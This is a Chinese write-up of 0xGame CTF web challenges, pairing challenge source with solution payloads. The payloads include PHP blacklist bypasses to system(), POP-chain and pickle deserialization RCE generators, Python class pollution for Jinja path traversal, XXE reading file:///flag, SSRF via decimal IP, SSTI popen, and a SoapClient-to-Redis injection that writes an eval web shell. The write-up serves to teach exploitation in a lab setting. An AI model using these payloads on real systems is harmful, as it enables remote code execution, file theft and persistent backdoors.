week1
RCE1
考点: 用字符串按位或运算(|)拼出 system,绕过关键字黑名单。另外 md5($rce1)===md5($rce2) && $rce1!==$rce2 是强比较,需要一对真正的 MD5 碰撞(或在 PHP 7 下传数组让 md5() 返回 NULL)才能进到 eval。
<?php
error_reporting(0);
highlight_file(__FILE__);
// rce1 comes from the query string, rce2/rce3 from the POST body; none is validated beyond the checks below.
$rce1 = $_GET['rce1'];
$rce2 = $_POST['rce2'];
$real_code = $_POST['rce3'];
// Case-insensitive deny-list applied to rce3 before eval(): every digit, the characters $ % & # @ *,
// and a list of function/command names. String bitwise operators (| ^ ~), quotes and the glob '?'
// are not covered, which is what the writeup's payload relies on.
$pattern = '/(?:\d|[\$%&#@*]|system|cat|flag|ls|echo|nl|rev|more|grep|cd|cp|vi|passthru|shell|vim|sort|strings)/i';
/**
 * Return true when $text matches the global deny-list regex $pattern.
 *
 * @param string $text  Code submitted as rce3.
 * @return bool         true = blocked, false = handed to eval() by the caller.
 */
function check(string $text): bool {
    global $pattern;
    $hit = preg_match($pattern, $text);
    return $hit === 1;
}
if (isset($rce1) && isset($rce2)){
    // Strict comparison of the two digest strings: a genuine MD5 collision pair is needed
    // (same hash, different bytes). NOTE(review): on PHP 7 array parameters (rce1[]=a, rce2[]=b)
    // also pass because md5(array) returns NULL; PHP 8 throws a TypeError instead.
    if(md5($rce1) === md5($rce2) && $rce1 !== $rce2){
        // rce3 is screened only by the deny-list regex and then evaluated verbatim.
        if(!check($real_code)){
            eval($real_code);
        } else {
            echo "Don't hack me ~";
        }
    } else {
        echo "md5 do not match correctly";
    }
}
else{
    echo "Please provide both rce1 and rce2";
}
?>
 
print_r(scandir('/'));		// list the filesystem root: 'ls' is on the deny-list, scandir() is not
 
(systee|systel)('tac /f???');		// byte-wise OR of the two strings: only the last byte differs, 'e'|'l' = 0x65|0x6c = 0x6d = 'm', giving "system". 'tac' avoids the 'cat' keyword and '?' globbing avoids both 'flag' and the banned '*'. The bare words depend on PHP < 8 treating undefined constants as strings; quoting them ('systee'|'systel') passes the same filter and also works on PHP 8.
 

Lemon
Ctrl+U 查看页面源码,flag 直接在源码里。
Http的真理,我已解明

一串 HTTP 头部八股题。最后一关要求"经过 clash 代理"访问,加上请求头 `Via: clash` 即可通过。
Rubbish_Unser
考点: POP 链 + 用两个 Exception 对象绕过 md5/sha1 强比较。md5()/sha1() 会通过 __toString() 把对象转成字符串,两个在同一行 new 出来的空 Exception 字符串完全相同,但它们是不同对象,!== 仍然成立。
<?php
error_reporting(0);
highlight_file(__FILE__);   // source disclosure by design; the gadget classes follow
class ZZZ
{
    public $yuzuha;
    function __construct($yuzuha)
    {
        $this -> yuzuha = $yuzuha;
    }
    // Chain entry: the string concatenation forces __toString() on whatever object is stored in
    // $yuzuha (a Mi instance in the writeup's chain).
    function __destruct()
    {
        echo "破绽,在这里!" . $this -> yuzuha;
    }
}
class HSR
{
    public $robin;
    // Chain sink: reading any undefined property (HI3rd reads ->Elysia) evaluates $robin as PHP.
    function __get($robin)
    {
        $castorice = $this -> robin;
        eval($castorice);
    }
}
class HI3rd
{
    public $RaidenMei;
    public $kiana;
    public $guanxing;
    // Reached when GI::__call() invokes $furina. Requires two *different* values with equal md5 and
    // sha1. md5()/sha1() coerce objects via __toString(), so two distinct Exception objects with the
    // same message, created on the same file/line and with no trace, stringify identically while
    // still being !== (object identity).
    function __invoke()
    {
        if($this -> kiana !== $this -> RaidenMei && md5($this -> kiana) === md5($this -> RaidenMei) && sha1($this -> kiana) === sha1($this -> RaidenMei))
            return $this -> guanxing -> Elysia;   // undefined property -> HSR::__get()
    }
}
class GI
{
    public $furina; 
    // Any undefined method call (Mi calls ->tks()) lands here and invokes $furina as a callable;
    // an object implementing __invoke() (HI3rd) qualifies.
    function __call($arg1, $arg2)
    {
        $Charlotte = $this -> furina;
        return $Charlotte();
    }
}
class Mi
{
    public $game;
    // Triggered by the concatenation in ZZZ::__destruct(). tks() does not exist on GI, so the call
    // goes to GI::__call(). '@' only silences warnings; the value returned is whatever came back from
    // HSR::__get() (null — presumably a __toString() TypeError on PHP 8, but only after eval() ran).
    function __toString()
    {
        $game1 = @$this -> game -> tks();
        return $game1;
    }
}
if (isset($_GET['0xGame'])) {
    $web = unserialize($_GET['0xGame']);
    // The uncaught exception aborts the request before normal shutdown, which is what keeps $web's
    // __destruct() from firing in the straightforward case. The writeup sidesteps this by truncating
    // the payload (dropping the final '}') so unserialize() fails part-way and the objects already
    // built are released — and destructed — right here, before the throw.
    throw new Exception("Rubbish_Unser");
}
?> 
 
链子很直接:ZZZ::__destruct 的字符串拼接 → Mi::__toString → GI::__call(tks 不存在)→ HI3rd::__invoke → 读不存在的 Elysia 属性 → HSR::__get → eval。两个绕过点:(1) unserialize 之后紧跟 throw,正常流程走不到 __destruct,所以把序列化串最后一个 } 去掉,让 unserialize 失败、已经建好的对象立刻被回收并触发 __destruct;(2) hash 比较用两个 Exception 对象,它们必须写在同一行 new,否则 __toString 里带的行号不同,md5 就不相等。
<?php
error_reporting(0);   // generator script: same class shapes as the target, plus step markers
class ZZZ
{
    public $yuzuha;

    /** Holds the object whose __toString() starts the chain. */
    function __construct($yuzuha)
    {
        $this->yuzuha = $yuzuha;
    }

    /** Concatenation coerces $yuzuha to string -> Mi::__toString(). */
    function __destruct()
    {
        $marker = "破绽,在这里!";
        echo $marker . $this->yuzuha;
    }
}
class HSR
{
    /** PHP source evaluated by __get(); the chain's final sink. */
    public $robin="system('env');";

    function __get($robin)
    {
        echo "4";   // step marker: 4th hop of the chain
        eval($this->robin);
    }
}
class HI3rd
{
    public $RaidenMei;
    public $kiana;
    public $guanxing;

    /** Step 3: hash "collision" gate, then a read of an undefined property -> HSR::__get(). */
    function __invoke()
    {
        echo "3";
        $left = $this->kiana;
        $right = $this->RaidenMei;
        // Same evaluation order as the original (short-circuit preserved).
        $distinct = $left !== $right;
        $sameMd5 = $distinct && md5($left) === md5($right);
        $sameSha1 = $sameMd5 && sha1($left) === sha1($right);
        if ($sameSha1) {
            return $this->guanxing->Elysia;
        }
    }
}
class GI
{
    public $furina;

    /** Step 2: any undefined method call invokes $furina (an object with __invoke()). */
    function __call($arg1, $arg2)
    {
        echo "2";
        return ($this->furina)();
    }
}
class Mi
{
    public $game;

    /** Step 1: tks() is undefined on GI, so this dispatches to GI::__call(). */
    function __toString()
    {
        echo "1";
        return @$this->game->tks();
    }
}
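// Build the chain outermost-first: ZZZ -> Mi -> GI -> HI3rd -> HSR.
$a = new ZZZ(1);
$a->yuzuha = new Mi();
$a->yuzuha->game = new GI();
$a->yuzuha->game->furina = new HI3rd();
// Both Exceptions MUST be constructed on the same source line: Exception::__toString() embeds the
// file and line (which are serialized with the object), and identical strings are what makes
// md5()/sha1() agree. They are distinct instances, so the !== check still holds; the different
// codes play no part in that.
$a->yuzuha->game->furina->kiana = new Exception("", 1); $a->yuzuha->game->furina->RaidenMei = new Exception("", 2);
$a->yuzuha->game->furina->guanxing = new HSR();
$payload = serialize($a);
// Drop the final '}' so unserialize() on the target fails part-way: the objects already built are
// freed immediately and ZZZ::__destruct() fires before the script reaches its `throw`.
$payload = substr($payload, 0, -1);
echo urlencode($payload);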
?>
 
Lemon_RevEnge
考点: Python 类污染(merge 对键名不做任何过滤,可以沿 __init__ → __globals__ 一路走到模块级的 os)→ 改写 os.path.pardir。Jinja2 的模板加载器会拒绝等于 os.path.pardir("..")的路径片段,把它污染成 "!" 之后 ".." 就不再被拦,render_template 即可穿越出 templates 目录(请求时要让 ".." 原样到达服务端,客户端不要先做路径规范化)。
from flask import Flask,request,render_template
import json
import os
app = Flask(__name__)  # templates resolve relative to ./templates (see render_page below)
def merge(src, dst):
    """Recursively copy the entries of ``src`` (a dict) into ``dst``.

    Mapping-like targets (anything exposing ``__getitem__``) are written with
    ``dst[key]``; any other object is written with ``setattr``. When the incoming
    value is a dict and the target already holds something truthy under that key,
    the merge recurses into it instead of overwriting.

    SECURITY: keys are not filtered, so a request body can walk from an object to
    ``__init__`` -> ``__globals__`` and overwrite module-level state (the "class
    pollution" this challenge is built around).
    """
    for key, incoming in src.items():
        is_nested = type(incoming) is dict
        if hasattr(dst, '__getitem__'):
            # ``dst.get`` is assumed here, so a list-like target would raise.
            current = dst.get(key)
            if current and is_nested:
                merge(incoming, current)
            else:
                dst[key] = incoming
            continue
        if is_nested and hasattr(dst, key):
            merge(incoming, getattr(dst, key))
        else:
            setattr(dst, key, incoming)
class Dst():
    # Deliberately empty. What matters for the pollution is that __init__ is a plain Python
    # function, so Dst.__init__.__globals__ is this module's namespace (which holds `os`).
    def __init__(self):
        pass
Game0x = Dst()  # single process-wide instance: anything merged into it persists across requests
@app.route('/',methods=['POST', 'GET'])
def index():
    # Any raw request body is parsed as JSON and merged straight into the shared Game0x instance.
    # No key filtering, so dunder keys reach Dst.__init__.__globals__ (this module's namespace)
    # and from there the imported `os` module.
    if request.data:
        merge(json.loads(request.data), Game0x)
    return render_template("index.html", Game0x=Game0x)
@app.route("/<path:path>")
def render_page(path):
    # Existence check only; '..' is not rejected here. Traversal is normally stopped inside
    # Jinja2's loader, which refuses any path segment equal to os.path.pardir — so polluting
    # os.path.pardir (to "!") is what lets render_template() load a file outside templates/.
    if not os.path.exists("templates/" + path):
        return "Not Found", 404
    return render_template(path)
if __name__ == '__main__':
    # Binds to all interfaces on port 9000.
    app.run(host='0.0.0.0', port=9000)
 
{
    "__init__":{
        "__globals__":{
            "os":{
                "path":{
                    "pardir":"!"
                }
            }
        }
    }
}
 
Python原型链污染 – Jaren’s Blog
浅谈Python原型链污染及利用方式-先知社区
留言板(粉)
用 admin/admin123 登录,页面标题提示是 XXE;提交的 XML 里定义一个指向 file:///flag 的外部实体,实体内容随回显字段一起带出。
<!-- In-band XXE: the server-side parser expands the external entity and the file contents come
     back wherever username/password are reflected. Requires external entity resolution to be
     enabled in the parser (e.g. libxml with LIBXML_NOENT). -->
<!DOCTYPE evil [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user><username>&xxe;</username><password>&xxe;</password></user>
 

留言板_reVenge
有点懵:同样的无过滤 XXE 直接就打通了。如果题目真的没有回显,标准思路是外带(OOB)XXE——用参数实体加载攻击者服务器上的外部 DTD,把文件内容拼进对外请求里带出。

week2
你好,爪洼脚本
考 aaEncode(颜文字混淆的 JavaScript),用下面的工具解码即得 flag。
aaEncode加密解密工具
0xGame{Hello,JavaScript}
 
马哈鱼商店
考点:pickle反序列化(文本协议)
买 flag 是幌子;真正的入口是买 pickle,把折扣改成 0.0001 就买得起,之后就能看到 /pickle_dsa 的源码。

# Reconstructed from the page's collapsed listing. Visiting the route without ?data= shows
# "Use GET To Send Your Loved Data!!!". The deny-list entries render as b'' on the page; the
# writeup's own note identifies the byte as 0x1E (ASCII Record Separator), so it is spelled out
# here — confirm the second entry against the live source.
BlackList = [b'\x1e', b'\x1e']


@app.route('/pickle_dsa')
def pic():
    """Base64-decode ?data=, reject a raw byte, then pickle.loads() it.

    Unpickling untrusted input runs arbitrary code via __reduce__; the single-byte
    deny-list is avoided with a protocol-0 (text) pickle.
    """
    data = request.args.get('data')
    if not data:
        return "Use GET To Send Your Loved Data"
    try:
        data = base64.b64decode(data)
    except Exception:
        return "Cao!!!"
    for b in BlackList:
        if b in data:
            return "卡了"
    p = pickle.loads(data)
    print(p)
    # The page shows a line break before "Vamos!" (probably a "<br>" or "\n" in the original).
    return f"Vamos! {p}"
 
打pickle反序列化
import pickle
import base64
import  os
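class P(object):
    """Pickle gadget: unpickling this object calls eval() on the server (arbitrary code)."""

    # Shell command whose output we want back; change this rather than __reduce__.
    # Must not contain a single quote — it is spliced into a single-quoted literal.
    command = "env"

    def __reduce__(self):
        # Protocol 0 writes the GLOBAL opcode ('c') naming eval, then this string as the argument.
        expr = f"__import__('os').popen('{self.command}').read()"
        return (eval, (expr,))


payload = pickle.dumps(P(), protocol=0)
# The target rejects any data containing 0x1E. Protocol-0 opcodes are printable ASCII, so the
# only way 0x1E could appear is via `command` itself; fail loudly instead of sending junk.
if b"\x1e" in payload:
    raise SystemExit("payload contains the blacklisted 0x1E byte; choose another command")
b64_payload = base64.b64encode(payload)
print(payload)
print(b64_payload.decode())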
 
注意这里要用 protocol=0(文本协议)。黑名单里的 b'' 在页面上显示为空,其实是单个字节 0x1E(ASCII Record Separator),服务端拒绝任何包含该字节的数据。pickle 的二进制协议(1~5)里很容易出现各种不可打印字节,0x1E 也在其中;而 protocol 0 的操作码全是可打印 ASCII,只有字符串参数本身才可能带入 0x1E——这里的表达式是纯 ASCII,所以用 protocol=0 生成的 payload 不会触发黑名单。
DNS想要玩
考点: 黑名单只对 URL 文本做子串匹配,而 check() 看的是解析后的 IP,所以把 114.5.1.4 写成十进制整数等形式即可绕过;通过校验后 /ssrf 其实并不发请求,而是直接 os.popen 执行 cmd 参数。
题目给了源码
from flask import Flask, request
from urllib.parse import urlparse
import socket
import os
app = Flask(__name__)
# Substring deny-list applied to the raw URL text (see ssrf()). It names the dotted-quad
# "114.5.1.4" but none of its decimal/octal/hex spellings, which check() resolves just the same.
BlackList = [
    'localhost', '@', '172', 'gopher', 'file', 'dict', 'tcp', '0.0.0.0', '114.5.1.4'
]
def check(url: str) -> bool:
    """Return True only if the host part of ``url`` resolves to 114.5.1.4.

    The decision is made on the *resolved* address, not on the URL text, so any
    spelling the resolver accepts (decimal ``1912930564``, octal/hex forms, or a
    DNS name with an A record of 114.5.1.4) passes even though the literal
    "114.5.1.4" is on the deny-list. Resolution failure counts as rejection; an
    IDNA encoding error is not caught and propagates to the caller.
    """
    host = urlparse(url).hostname
    if not host:
        return False
    ascii_host = host.encode('idna').decode('utf-8')
    try:
        return socket.gethostbyname(ascii_host) == '114.5.1.4'
    except Exception:
        return False
@app.route('/')
def index():
    # Source disclosure by design: returns this file verbatim.
    return open(__file__, 'r', encoding='utf-8').read()
@app.route('/ssrf')
def ssrf():
    raw_url = request.args.get('url')
    if not raw_url:
        return 'URL Needed'
    # Substring match against the raw text only; check() then judges the *resolved* address.
    for u in BlackList:
        if u in raw_url:
            return 'Invaild URL'
    # Despite the route name no request to `url` is ever made: passing check() simply unlocks
    # os.popen() on an attacker-chosen shell command — command execution gated by a DNS lookup.
    if check(raw_url):
        cmd = request.args.get('cmd', '')
        return os.popen(cmd).read()
    else:
        return 'NONONO'
if __name__ == '__main__':
    # Binds to all interfaces on port 8000.
    app.run(host='0.0.0.0', port=8000)
 
ssrf?url=http://1912930564/&cmd=cat%20/f*
 
办法很多(十进制/八进制/十六进制整数形式的 IP,或者一个 A 记录指向 114.5.1.4 的自有域名都行),这里用十进制:114·2^24 + 5·2^16 + 1·2^8 + 4 = 1912930564。
ctfshow-web-351-360-ssrf-wp_ctfshow web360-CSDN博客
这真的是反序列化
<?php
highlight_file(__FILE__);
error_reporting(0);
//hint: Redis20251206   (points at a local Redis; the writeup uses the trailing digits as the AUTH password)
class pure{
    public $web;
    public $misc;
    public $crypto;
    public $pwn;
    public function __construct($web, $misc, $crypto, $pwn){
        $this->web = $web;
        $this->misc = $misc;
        $this->crypto = $crypto;
        $this->pwn = $pwn;
    }
    // Instantiates an attacker-named class with two attacker-controlled constructor arguments.
    // The writeup picks SoapClient: new SoapClient(null, ['location' => ..., 'uri' => ...]).
    public function reverse(){
        $this->pwn = new $this->web($this->misc, $this->crypto);
    }
    // play_0xGame() is not a SoapClient method, so this lands in SoapClient::__call(), which
    // issues an HTTP POST to 'location' — the SSRF primitive (this file has no network code).
    public function osint(){
        $this->pwn->play_0xGame();
    }
    // Both steps run automatically when the unserialized object is destroyed.
    public function __destruct(){
        $this->reverse();
        $this->osint();
    }
}
// Untrusted input straight into unserialize(); the gadget above fires from __destruct().
$AI = $_GET['ai'];
$ctf = unserialize($AI);
?>
 
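<?php
// Generator for the `pure` gadget: unserialize() -> __destruct() -> reverse() instantiates $web
// with ($misc, $crypto) -> osint() calls play_0xGame() on it. With $web = SoapClient the undefined
// method hits SoapClient::__call(), which POSTs to 'location'. The 'uri' option is copied into the
// SOAPAction header (and the request body), so CRLF inside it injects raw lines that a Redis on
// 127.0.0.1:6379 reads as inline commands; the HTTP lines around them are just rejected.
// NOTE(review): SOAPAction is emitted quoted (SOAPAction: "..."), so the first injected line carries
// an unbalanced quote. If Redis answers "unbalanced quotes" and drops the connection, move the
// injection into the 'user_agent' option instead, which is emitted unquoted.
class pure
{
    public $web = 'SoapClient';
    public $misc = null;     // SoapClient $wsdl: null = non-WSDL mode, needs 'location' + 'uri'
    public $crypto;          // SoapClient $options array, filled in below (was misspelled $crypt)
    public $pwn;
}

$target = 'http://127.0.0.1:6379/';
// The page's hint reads "Redis20251206" while the writeup authenticates with "20251206";
// confirm which string is the real password if AUTH fails.
$poc1 = "AUTH 20251206";
$poc2 = "CONFIG SET dir /var/www/html";
// '<?' depends on short_open_tag; '<?php' is the portable form.
$poc3 = "SET x '<?@eval(\$_POST[1]);?>'";
$poc4 = "CONFIG SET dbfilename shell.php";
$poc5 = "SAVE";

// '^^' is a 2-byte placeholder for "\r\n" (also 2 bytes), so the s:N:"..." lengths written by
// serialize() stay valid after the replacement below.
$options = array(
    'location' => $target,
    'uri' => 'ai^^' . $poc1 . '^^' . $poc2 . '^^' . $poc3 . '^^' . $poc4 . '^^' . $poc5 . '^^ai',
);

$p = new pure();
$p->crypto = $options;
$payload = str_replace('^^', "\r\n", serialize($p));
echo urlencode($payload);   // send as ?ai=<payload>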
 
404NotFound
测试一下ssti

过滤了一些关键词和 `.`:用相邻字符串字面量拼接('__glo''bals__')把关键词拆开,用 [] 下标代替属性访问,从 Jinja 内置的 lipsum 函数的 __globals__ 拿到 os,再 popen 读 flag。
{{lipsum['__glo''bals__']['o''s']['po''pen']('cat /f*')['re''ad']()}}
 

Plus_plus
输入?0xGame=1得到源码
<?php
error_reporting(0);
// Any value for ?0xGame= dumps this source.
if (isset($_GET['0xGame'])) {
    highlight_file(__FILE__);
}
if (isset($_POST['web'])) {
    $web = $_POST['web'];
    // The whole payload, final statement included, must fit in 120 bytes.
    if (strlen($web) <= 120) {
        if (is_string($web)) {
            // Deny-list (after PHP string escapes: \" -> ", \/ -> /, \\\\ -> one regex backslash):
            //   ! @ # % ^ & * : ' - < ? > " / | ` ~ \  plus every lowercase letter and the uppercase
            //   ranges A-B, D-G, I-Z. Still allowed: digits, space, $ ( ) [ ] { } . + = ; , _ and the
            //   letters C and H — enough for PHP's string increment ($_++) the title hints at.
            if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-BD-GI-Z~\\\\]/", $web)) {
                eval($web);
            } else {
                echo("NONONO!");
            }
        } else {
            echo "No String!";
        }
    } else {
        echo "too long!";
    }
}
?>